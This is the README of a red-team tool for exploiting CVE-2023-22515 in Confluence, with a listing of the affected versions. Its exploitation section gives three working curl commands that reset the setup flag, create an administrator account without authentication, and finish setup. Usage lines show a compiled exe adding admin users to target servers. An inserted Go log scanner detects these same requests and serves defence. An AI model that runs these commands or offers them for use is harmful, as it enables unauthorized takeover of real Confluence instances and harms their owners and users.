# Red team tool - Confluence unauthenticated administrator user creation (CVE-2023-22515) exploitation tool
## Affected versions
```
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1
```
## Exploitation
### 1. Normal access shows that installation is already complete
```
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
```
### 2. Create an administrator user
```
test123 Password2
```
Run the following command:
```
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action
```
### 3. Setup complete
```
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action
```
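
To check whether the three requests above have already reached a server, this added example (not part of the original tool or README) scans access-log lines for them and groups the matches by client IP. It assumes Common Log Format lines; the function names and the sample log lines are constructed for illustration.

```go
package main
import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Assumed layout (Common Log Format): ip - - [time] "METHOD URI PROTO" status size
var reqRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})`)

// Classify maps a request to one of the three steps above, or "" if none.
func Classify(method, rawURI string) string {
	if u, err := url.QueryUnescape(rawURI); err == nil {
		rawURI = u // also match %-encoded parameter names
	}
	uri := strings.ToLower(rawURI)
	switch {
	case strings.Contains(uri, "bootstrapstatusprovider.applicationconfig"):
		return "override"
	case method == "POST" && strings.Contains(uri, "/setup/setupadministrator.action"):
		return "admin"
	case method == "POST" && strings.Contains(uri, "/setup/finishsetup.action"):
		return "finish"
	}
	return ""
}

// Scan returns, per client IP, the matched steps in log order as "step:status".
func Scan(lines []string) map[string][]string {
	hits := map[string][]string{}
	for _, l := range lines {
		if m := reqRe.FindStringSubmatch(l); m != nil && Classify(m[2], m[3]) != "" {
			hits[m[1]] = append(hits[m[1]], Classify(m[2], m[3])+":"+m[4])
		}
	}
	return hits
}

// Sample is constructed test data, not taken from a real server.
var Sample = []string{
	`192.0.2.10 - - [16/Oct/2023:10:14:01 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 200 512`,
	`192.0.2.10 - - [16/Oct/2023:10:14:02 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 200 4096`,
	`192.0.2.10 - - [16/Oct/2023:10:14:03 +0000] "POST /setup/finishsetup.action HTTP/1.1" 200 128`,
	`198.51.100.7 - - [16/Oct/2023:10:15:00 +0000] "GET /dashboard.action HTTP/1.1" 200 9000`,
}
func main() {
	fmt.Println(Scan(Sample))
}
```

A client that shows `override` followed by `admin` should be followed up by reviewing the administrator accounts created around that time. Any POST to a `/setup/` path on an instance whose installation finished long ago deserves review on its own.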
## Usage
```
cve-2023-22515.exe
Usage of cve-2023-22515.exe:
-pass string
指定要添加的密码
-proxy string
设置代理
-u string
指定目标
-user string
指定要添加的用户名
```
### Random username and password
```
cve-2023-22515.exe -u http://10.108.3.117:8090
```

### Manually add an administrator user
```
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2
```

## Changelog
```
[+] 2023/10/16 Added random username and password
```
```
[4.0K] /data/pocs/e1f04a866f7b4e84b14684c05aabe11c074589f0
├── [  33] go.mod
├── [4.0K] images
│   ├── [ 15K] image-20231011164412511.png
│   ├── [ 11K] image-20231011164858593.png
│   └── [9.3K] Snipaste_2023-10-16_10-14-22.png
├── [3.6K] main.go
└── [1.9K] README.md

1 directory, 6 files
```